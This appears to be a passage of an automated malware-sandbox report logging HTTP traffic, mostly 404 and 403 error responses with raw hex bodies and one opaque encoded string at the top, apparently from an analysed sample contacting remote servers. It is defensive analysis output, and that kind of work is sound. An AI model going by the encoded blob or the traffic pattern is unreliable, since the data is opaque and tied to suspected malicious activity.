c4qx7JIP=QPLiKYhL3NQ0IQXmhCuG8kP87wSxrG5QjbSaRn587E1XPMckan7MFObs3HVsPbuRoi1fGXXhFKU39TqGPu2Pr6KYF0TciKE01pTyh/GjjSVdntlQPGeegcRFsQJKIVpISZH/ApRNnfSmdT4hCsocuDIwCbVZ1gILqD/YSqCZzzOVsiwcx7ir0g1A0NVbBH+MVA==
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecontent-type: text/htmllast-modified: Thu, 23 Jun 2022 13:08:36 GMTetag: "999-62b465d4-7483b18151e2685e;br"accept-ranges: bytescontent-encoding: brvary: Accept-Encodingcontent-length: 912date: Mon, 18 Mar 2024 14:08:45 GMTserver: LiteSpeedplatform: hostingerData Raw: 02 33 01 80 1c cb 59 ff 7c 5e d3 7a f6 90 9a d1 13 d5 89 13 81 1c c3 8a f9 f1 73 6a 9b 08 2b df dd 4f 0a 44 aa 73 c4 1f 32 66 47 20 dc 5c e5 88 9c 27 a1 a6 43 5c 9d 2b a5 4a c8 4b 27 5e 48 40 fa 18 94 1a 0a 69 bc ea a6 86 9f 52 17 4a 69 8d ea 0e fc 3d b3 03 04 6f b5 a7 ae ae 84 71 8e 48 4e c5 44 c6 95 21 29 7c 8c 84 24 0e 50 4a 62 99 b8 21 12 32 8b 99 4c cf 45 53 1b 2a 49 7c 35 45 4e c4 54 82 cd 4f cf d9 bc 15 4d 2a 0d f5 c0 25 19 9d d1 68 52 e7 73 e5 40 83 71 72 32 95 2e c9 78 53 be d0 03 d2 36 19 08 4c 4b 7c 43 ea f0 66 29 5e 86 ba 00 e1 b8 a5 ca c6 e8 5b 24 67 f2 16 94 0d ed 26 3d b8 a0 44 ba df 54 7e 7b fd ea 63 ba aa dd 63 60 ce 9b 02 54 94 a8 f3 0d f8 a7 96 6d aa 30 b6 2f a1 cb 43 a5 d2 f7 78 88 dc 0b 98 86 ee 36 b6 ff f6 5b 3f 4d fe 6b 17 d7 16 ab df ec 8b 85 f9 86 40 cf f8 e5 a2 17 87 a8 d8 c9 1b 49 58 b3 99 5c e8 24 dd 19 eb c7 1f 44 b8 69 d6 42 b8 3e e3 41 34 ea d4 0e ba 26 29 4d da bd e5 6e 83 b7 c8 1c 41 ba 17 3d 64 32 e6 d0 48 8a 48 c5 91 9c 0a ad 45 b6 a7 30 d8 b0 57 4d 47 c5 85 75 2b c3 90 37 e6 40 5f 21 59 07 96 73 0e 13 a3 eb a9 9d 18 0d 9a 8f c5 e7 8f 15 2a ce eb 86 66 2c 74 40 5c 0e c0 a3 87 99 a7 20 21 c3 00 88 18 78 b3 6a aa 8c 31 65 c8 5b db 12 03 08 09 02 ba 49 23 12 d4 47 ea 01 5f 58 0d b0 2f 47 80 7e 97 5b cc 53 18 9d 76 9b bc 00 3f 47 90 29 70 cc 07 24 4b 3e 32 2a d2 75 a9 d6 a6 02 08 d5 03 9f e0 04 7d 0b 9f d8 98 fe 22 22 17 ee 1c 61 21 ac ca 4b 70 14 3c 18 43 ef 06 2f e2 c4 08 97 df 21 ef b0 fd 00 80 e5 7e d8 4b ce c5 5c ac 0d 4f ba 1f 2d 1a 6d 22 d3 e8 ee 97 59 e3 49 78 cd 32 b6 1a 05 e1 79 18 c6 bb a9 b7 6d 6a ee 7c 44 43 3b 3f d9 99 4f 26 9a 79 e1 e0 e2 8d b5 b2 57 d6 da 5e 5b 1b 6b 63 28 8d f0 b1 65 86 0f b5 22 41 83 da c3 e8 3d 9a 11 b3 2c 67 8e 21 6b c2 6b fd 73 f4 34 65 52 5f 49 f6 42 5d 46 bf 95 db eb 9f ee b7 7a 91 bb b9 d1 b1 40 d8 cc b1 0a 8e c5 ca e2 bf ba 52 97 c1 70 e8 74 5d ef 54 0a 6f 99 c0 3f aa d5 f4 c4 a4 e7 f0 08 7d 3a 0e f7 a8 c8 85 ed b7 21 8b e2 b0 46 d1 7f 1e c9 9e 2c 64 19 51 0a 85 c7 ff 3b 6a ba 47 41 2e 56 f9 be 11 8e 2f 38 ce b2 64 81 91 d0 db b7 58 62 e3 74 46 19 ff c8 b2 51 c5 01 e0 f9 12 e3 1c 8d 2a 4f fa a4 77 49 23 36 ca 91 7a ba fa db 39 8e 47 39 03 9f bb e3 f3 7d 3e 5b 2d d7 cb ed 66 cb 17 ab 4f a9 43 22 02 29 1b f0 0e ec 60 24 30 62 57 69 f6 20 ab d3 e1 34 e1 60 74 4d 4e 65 1f 90 e8 b3 51 11 53 d3 67 1e c2 6f e7 1f 8b 53 11 87 a5 1e 89 da a4 72 46 d9 4a 6a fc 0f 2c 99 34 f9 a9 94 1a 9d 80 96 d4 6e c9 64 35 63 75 d2 99 a1 03 22 36 97 e7 48 d4 10 27 1e a8 03 ec 34 41 83 78 b0 07 1d d1 36 5d 30 36 90 e1 54 ba e3 d5 2e 1d aa d1 69 34 fa d7 20 78 4e 26 dd 2d 6e d0 31 57 79 1c 39 62 ae 2c bf 02 19 9e d6 9e 41 79 4a 1e d0 00 c6 f1 58 5b e6 c3 e8 a5 c2 28 1a d2 a5 73
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecontent-type: text/htmllast-modified: Thu, 23 Jun 2022 13:08:36 GMTetag: "999-62b465d4-7483b18151e2685e;br"accept-ranges: bytescontent-encoding: brvary: Accept-Encodingcontent-length: 912date: Mon, 18 Mar 2024 14:08:48 GMTserver: LiteSpeedplatform: hostingerData Raw: 02 33 01 80 1c cb 59 ff 7c 5e d3 7a f6 90 9a d1 13 d5 89 13 81 1c c3 8a f9 f1 73 6a 9b 08 2b df dd 4f 0a 44 aa 73 c4 1f 32 66 47 20 dc 5c e5 88 9c 27 a1 a6 43 5c 9d 2b a5 4a c8 4b 27 5e 48 40 fa 18 94 1a 0a 69 bc ea a6 86 9f 52 17 4a 69 8d ea 0e fc 3d b3 03 04 6f b5 a7 ae ae 84 71 8e 48 4e c5 44 c6 95 21 29 7c 8c 84 24 0e 50 4a 62 99 b8 21 12 32 8b 99 4c cf 45 53 1b 2a 49 7c 35 45 4e c4 54 82 cd 4f cf d9 bc 15 4d 2a 0d f5 c0 25 19 9d d1 68 52 e7 73 e5 40 83 71 72 32 95 2e c9 78 53 be d0 03 d2 36 19 08 4c 4b 7c 43 ea f0 66 29 5e 86 ba 00 e1 b8 a5 ca c6 e8 5b 24 67 f2 16 94 0d ed 26 3d b8 a0 44 ba df 54 7e 7b fd ea 63 ba aa dd 63 60 ce 9b 02 54 94 a8 f3 0d f8 a7 96 6d aa 30 b6 2f a1 cb 43 a5 d2 f7 78 88 dc 0b 98 86 ee 36 b6 ff f6 5b 3f 4d fe 6b 17 d7 16 ab df ec 8b 85 f9 86 40 cf f8 e5 a2 17 87 a8 d8 c9 1b 49 58 b3 99 5c e8 24 dd 19 eb c7 1f 44 b8 69 d6 42 b8 3e e3 41 34 ea d4 0e ba 26 29 4d da bd e5 6e 83 b7 c8 1c 41 ba 17 3d 64 32 e6 d0 48 8a 48 c5 91 9c 0a ad 45 b6 a7 30 d8 b0 57 4d 47 c5 85 75 2b c3 90 37 e6 40 5f 21 59 07 96 73 0e 13 a3 eb a9 9d 18 0d 9a 8f c5 e7 8f 15 2a ce eb 86 66 2c 74 40 5c 0e c0 a3 87 99 a7 20 21 c3 00 88 18 78 b3 6a aa 8c 31 65 c8 5b db 12 03 08 09 02 ba 49 23 12 d4 47 ea 01 5f 58 0d b0 2f 47 80 7e 97 5b cc 53 18 9d 76 9b bc 00 3f 47 90 29 70 cc 07 24 4b 3e 32 2a d2 75 a9 d6 a6 02 08 d5 03 9f e0 04 7d 0b 9f d8 98 fe 22 22 17 ee 1c 61 21 ac ca 4b 70 14 3c 18 43 ef 06 2f e2 c4 08 97 df 21 ef b0 fd 00 80 e5 7e d8 4b ce c5 5c ac 0d 4f ba 1f 2d 1a 6d 22 d3 e8 ee 97 59 e3 49 78 cd 32 b6 1a 05 e1 79 18 c6 bb a9 b7 6d 6a ee 7c 44 43 3b 3f d9 99 4f 26 9a 79 e1 e0 e2 8d b5 b2 57 d6 da 5e 5b 1b 6b 63 28 8d f0 b1 65 86 0f b5 22 41 83 da c3 e8 3d 9a 11 b3 2c 67 8e 21 6b c2 6b fd 73 f4 34 65 52 5f 49 f6 42 5d 46 bf 95 db eb 9f ee b7 7a 91 bb b9 d1 b1 40 d8 cc b1 0a 8e c5 ca e2 bf ba 52 97 c1 70 e8 74 5d ef 54 0a 6f 99 c0 3f aa d5 f4 c4 a4 e7 f0 08 7d 3a 0e f7 a8 c8 85 ed b7 21 8b e2 b0 46 d1 7f 1e c9 9e 2c 64 19 51 0a 85 c7 ff 3b 6a ba 47 41 2e 56 f9 be 11 8e 2f 38 ce b2 64 81 91 d0 db b7 58 62 e3 74 46 19 ff c8 b2 51 c5 01 e0 f9 12 e3 1c 8d 2a 4f fa a4 77 49 23 36 ca 91 7a ba fa db 39 8e 47 39 03 9f bb e3 f3 7d 3e 5b 2d d7 cb ed 66 cb 17 ab 4f a9 43 22 02 29 1b f0 0e ec 60 24 30 62 57 69 f6 20 ab d3 e1 34 e1 60 74 4d 4e 65 1f 90 e8 b3 51 11 53 d3 67 1e c2 6f e7 1f 8b 53 11 87 a5 1e 89 da a4 72 46 d9 4a 6a fc 0f 2c 99 34 f9 a9 94 1a 9d 80 96 d4 6e c9 64 35 63 75 d2 99 a1 03 22 36 97 e7 48 d4 10 27 1e a8 03 ec 34 41 83 78 b0 07 1d d1 36 5d 30 36 90 e1 54 ba e3 d5 2e 1d aa d1 69 34 fa d7 20 78 4e 26 dd 2d 6e d0 31 57 79 1c 39 62 ae 2c bf 02 19 9e d6 9e 41 79 4a 1e d0 00 c6 f1 58 5b e6 c3 e8 a5 c2 28 1a d2 a5 73
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecontent-type: text/htmllast-modified: Thu, 23 Jun 2022 13:08:36 GMTetag: "999-62b465d4-7483b18151e2685e;br"accept-ranges: bytescontent-encoding: brvary: Accept-Encodingcontent-length: 912date: Mon, 18 Mar 2024 14:08:51 GMTserver: LiteSpeedplatform: hostingerData Raw: 02 33 01 80 1c cb 59 ff 7c 5e d3 7a f6 90 9a d1 13 d5 89 13 81 1c c3 8a f9 f1 73 6a 9b 08 2b df dd 4f 0a 44 aa 73 c4 1f 32 66 47 20 dc 5c e5 88 9c 27 a1 a6 43 5c 9d 2b a5 4a c8 4b 27 5e 48 40 fa 18 94 1a 0a 69 bc ea a6 86 9f 52 17 4a 69 8d ea 0e fc 3d b3 03 04 6f b5 a7 ae ae 84 71 8e 48 4e c5 44 c6 95 21 29 7c 8c 84 24 0e 50 4a 62 99 b8 21 12 32 8b 99 4c cf 45 53 1b 2a 49 7c 35 45 4e c4 54 82 cd 4f cf d9 bc 15 4d 2a 0d f5 c0 25 19 9d d1 68 52 e7 73 e5 40 83 71 72 32 95 2e c9 78 53 be d0 03 d2 36 19 08 4c 4b 7c 43 ea f0 66 29 5e 86 ba 00 e1 b8 a5 ca c6 e8 5b 24 67 f2 16 94 0d ed 26 3d b8 a0 44 ba df 54 7e 7b fd ea 63 ba aa dd 63 60 ce 9b 02 54 94 a8 f3 0d f8 a7 96 6d aa 30 b6 2f a1 cb 43 a5 d2 f7 78 88 dc 0b 98 86 ee 36 b6 ff f6 5b 3f 4d fe 6b 17 d7 16 ab df ec 8b 85 f9 86 40 cf f8 e5 a2 17 87 a8 d8 c9 1b 49 58 b3 99 5c e8 24 dd 19 eb c7 1f 44 b8 69 d6 42 b8 3e e3 41 34 ea d4 0e ba 26 29 4d da bd e5 6e 83 b7 c8 1c 41 ba 17 3d 64 32 e6 d0 48 8a 48 c5 91 9c 0a ad 45 b6 a7 30 d8 b0 57 4d 47 c5 85 75 2b c3 90 37 e6 40 5f 21 59 07 96 73 0e 13 a3 eb a9 9d 18 0d 9a 8f c5 e7 8f 15 2a ce eb 86 66 2c 74 40 5c 0e c0 a3 87 99 a7 20 21 c3 00 88 18 78 b3 6a aa 8c 31 65 c8 5b db 12 03 08 09 02 ba 49 23 12 d4 47 ea 01 5f 58 0d b0 2f 47 80 7e 97 5b cc 53 18 9d 76 9b bc 00 3f 47 90 29 70 cc 07 24 4b 3e 32 2a d2 75 a9 d6 a6 02 08 d5 03 9f e0 04 7d 0b 9f d8 98 fe 22 22 17 ee 1c 61 21 ac ca 4b 70 14 3c 18 43 ef 06 2f e2 c4 08 97 df 21 ef b0 fd 00 80 e5 7e d8 4b ce c5 5c ac 0d 4f ba 1f 2d 1a 6d 22 d3 e8 ee 97 59 e3 49 78 cd 32 b6 1a 05 e1 79 18 c6 bb a9 b7 6d 6a ee 7c 44 43 3b 3f d9 99 4f 26 9a 79 e1 e0 e2 8d b5 b2 57 d6 da 5e 5b 1b 6b 63 28 8d f0 b1 65 86 0f b5 22 41 83 da c3 e8 3d 9a 11 b3 2c 67 8e 21 6b c2 6b fd 73 f4 34 65 52 5f 49 f6 42 5d 46 bf 95 db eb 9f ee b7 7a 91 bb b9 d1 b1 40 d8 cc b1 0a 8e c5 ca e2 bf ba 52 97 c1 70 e8 74 5d ef 54 0a 6f 99 c0 3f aa d5 f4 c4 a4 e7 f0 08 7d 3a 0e f7 a8 c8 85 ed b7 21 8b e2 b0 46 d1 7f 1e c9 9e 2c 64 19 51 0a 85 c7 ff 3b 6a ba 47 41 2e 56 f9 be 11 8e 2f 38 ce b2 64 81 91 d0 db b7 58 62 e3 74 46 19 ff c8 b2 51 c5 01 e0 f9 12 e3 1c 8d 2a 4f fa a4 77 49 23 36 ca 91 7a ba fa db 39 8e 47 39 03 9f bb e3 f3 7d 3e 5b 2d d7 cb ed 66 cb 17 ab 4f a9 43 22 02 29 1b f0 0e ec 60 24 30 62 57 69 f6 20 ab d3 e1 34 e1 60 74 4d 4e 65 1f 90 e8 b3 51 11 53 d3 67 1e c2 6f e7 1f 8b 53 11 87 a5 1e 89 da a4 72 46 d9 4a 6a fc 0f 2c 99 34 f9 a9 94 1a 9d 80 96 d4 6e c9 64 35 63 75 d2 99 a1 03 22 36 97 e7 48 d4 10 27 1e a8 03 ec 34 41 83 78 b0 07 1d d1 36 5d 30 36 90 e1 54 ba e3 d5 2e 1d aa d1 69 34 fa d7 20 78 4e 26 dd 2d 6e d0 31 57 79 1c 39 62 ae 2c bf 02 19 9e d6 9e 41 79 4a 1e d0 00 c6 f1 58 5b e6 c3 e8 a5 c2 28 1a d2 a5 73
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecontent-type: text/htmllast-modified: Thu, 23 Jun 2022 13:08:36 GMTetag: "999-62b465d4-7483b18151e2685e;;;"accept-ranges: bytescontent-length: 2457date: Mon, 18 Mar 2024 14:08:53 GMTserver: LiteSpeedplatform: hostingerData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 75 73 22 20 70 72 65 66 69 78 3d 22 63 6f 6e 74 65 6e 74 3a 20 68 74 74 70 3a 2f 2f 70 75 72 6c 2e 6f 72 67 2f 72 73 73 2f 31 2e 30 2f 6d 6f 64 75 6c 65 73 2f 63 6f 6e 74 65 6e 74 2f 20 64 63 3a 20 68 74 74 70 3a 2f 2f 70 75 72 6c 2e 6f 72 67 2f 64 63 2f 74 65 72 6d 73 2f 20 66 6f 61 66 3a 20 68 74 74 70 3a 2f 2f 78 6d 6c 6e 73 2e 63 6f 6d 2f 66 6f 61 66 2f 30 2e 31 2f 20 6f 67 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 20 72 64 66 73 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 30 31 2f 72 64 66 2d 73 63 68 65 6d 61 23 20 73 69 6f 63 3a 20 68 74 74 70 3a 2f 2f 72 64 66 73 2e 6f 72 67 2f 73 69 6f 63 2f 6e 73 23 20 73 69 6f 63 74 3a 20 68 74 74 70 3a 2f 2f 72 64 66 73 2e 6f 72 67 2f 73 69 6f 63 2f 74 79 70 65 73 23 20 73 6b 6f 73 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 34 2f 30 32 2f 73 6b 6f 73 2f 63 6f 72 65 23 20 78 73 64 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 23 22 3e 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 40 63 68 61 72 73 65 74 20 22 55 54 46 2d 38 22 3b 0a 20 20 20 20 20 20 20 20 5b 6e 67 5c 3a 63 6c 6f 61 6b 5d 2c 0a 20 20 20 20 20 20 20 20 5b 6e 67 2d 63 6c 6f 61 6b 5d 2c 0a 20 20 20 20 20 20 20 20 5b 64 61 74 61 2d 6e 67 2d 63 6c 6f 61 6b 5d 2c 0a 20 20 20 20 20 20 20 20 5b 78 2d 6e 67 2d 63 6c 6f 61 6b 5d 2c 0a 20 20 20 20 20 20 20 20 2e 6e 67 2d 63 6c 6f 61 6b 2c 0a 20 20 20 20 20 20 20 20 2e 78 2d 6e 67 2d 63 6c 6f 61 6b 2c 0a 20 20 20 20 20 20 20 20 2e 6e 67 2d 68 69 64 65 3a 6e 6f 74 28 2e 6e 67 2d 68 69 64 65 2d 61 6e 69 6d 61 74 65 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 6e 67 5c 3a 66 6f 72 6d 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 2e 6e 67 2d 61 6e 69 6d 61 74 65 2d 73 68 69 6d 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 69 73 69 62 69 6c 69 74 79 3a 20 68 69 64 64 65 6e 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 2e 6e 67 2d 61 6e 63 68 6f 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 18 Mar 2024 14:08:59 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingServer: namecheap-nginxContent-Encoding: gzipData Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 56 70 cb 2f 4a ca 4c 49 49 cd b3 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 6d 78 95 8e 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6a(HML),I310Vp/JLII&T";Ct@}4l"(//=3YNf>%mx0
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 18 Mar 2024 14:09:02 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingServer: namecheap-nginxContent-Encoding: gzipData Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 56 70 cb 2f 4a ca 4c 49 49 cd b3 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 6d 78 95 8e 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6a(HML),I310Vp/JLII&T";Ct@}4l"(//=3YNf>%mx0
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 18 Mar 2024 14:09:04 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingServer: namecheap-nginxContent-Encoding: gzipData Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 56 70 cb 2f 4a ca 4c 49 49 cd b3 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 6d 78 95 8e 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6a(HML),I310Vp/JLII&T";Ct@}4l"(//=3YNf>%mx0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 18 Mar 2024 14:09:21 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 18 Mar 2024 14:09:35 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: brData Raw: 39 36 0d 0a a1 50 06 00 20 06 cc ab af a4 5b 28 73 84 1c 85 17 6c 79 e0 f0 97 74 45 61 16 24 92 ec 66 03 1b e0 70 18 4f e7 36 76 56 61 06 41 4b c4 87 48 9a 89 51 76 a9 05 c2 05 69 a5 87 9e 01 a1 c6 e9 59 a5 4d 87 32 44 f5 ce 51 0c 4d 5b 71 e4 c1 fc 5c 2f b2 5c 84 f0 1a 81 11 10 df 3f c8 30 3f 58 8b 4d cc 19 57 d1 3f 71 df 58 b9 af dd 58 99 10 1f 72 99 eb 10 57 e3 f3 04 55 cb 8f fe f1 67 4f e3 df bf 71 bb 7f b0 bd e2 e5 0b b6 0c 4a a4 1f 23 00 6e 22 4d 8a 09 0d 0a 30 0d 0a 0d 0a Data Ascii: 96P [(slytEa$fpO6vVaAKHQviYM2DQM[q\/\?0?XMW?qXXrWUgOqJ#n"M0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 18 Mar 2024 14:09:38 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: brData Raw: 39 36 0d 0a a1 50 06 00 20 06 cc ab af a4 5b 28 73 84 1c 85 17 6c 79 e0 f0 97 74 45 61 16 24 92 ec 66 03 1b e0 70 18 4f e7 36 76 56 61 06 41 4b c4 87 48 9a 89 51 76 a9 05 c2 05 69 a5 87 9e 01 a1 c6 e9 59 a5 4d 87 32 44 f5 ce 51 0c 4d 5b 71 e4 c1 fc 5c 2f b2 5c 84 f0 1a 81 11 10 df 3f c8 30 3f 58 8b 4d cc 19 57 d1 3f 71 df 58 b9 af dd 58 99 10 1f 72 99 eb 10 57 e3 f3 04 55 cb 8f fe f1 67 4f e3 df bf 71 bb 7f b0 bd e2 e5 0b b6 0c 4a a4 1f 23 00 6e 22 4d 8a 09 0d 0a 30 0d 0a 0d 0a Data Ascii: 96P [(slytEa$fpO6vVaAKHQviYM2DQM[q\/\?0?XMW?qXXrWUgOqJ#n"M0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 18 Mar 2024 14:09:40 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: brData Raw: 39 36 0d 0a a1 50 06 00 20 06 cc ab af a4 5b 28 73 84 1c 85 17 6c 79 e0 f0 97 74 45 61 16 24 92 ec 66 03 1b e0 70 18 4f e7 36 76 56 61 06 41 4b c4 87 48 9a 89 51 76 a9 05 c2 05 69 a5 87 9e 01 a1 c6 e9 59 a5 4d 87 32 44 f5 ce 51 0c 4d 5b 71 e4 c1 fc 5c 2f b2 5c 84 f0 1a 81 11 10 df 3f c8 30 3f 58 8b 4d cc 19 57 d1 3f 71 df 58 b9 af dd 58 99 10 1f 72 99 eb 10 57 e3 f3 04 55 cb 8f fe f1 67 4f e3 df bf 71 bb 7f b0 bd e2 e5 0b b6 0c 4a a4 1f 23 00 6e 22 4d 8a 09 0d 0a 30 0d 0a 0d 0a Data Ascii: 96P [(slytEa$fpO6vVaAKHQviYM2DQM[q\/\?0?XMW?qXXrWUgOqJ#n"M0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 18 Mar 2024 14:09:43 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 203Connection: closeVary: Accept-EncodingData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 76 33 6b 61 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /v3ka/ was not found on this server.</p></body></html>
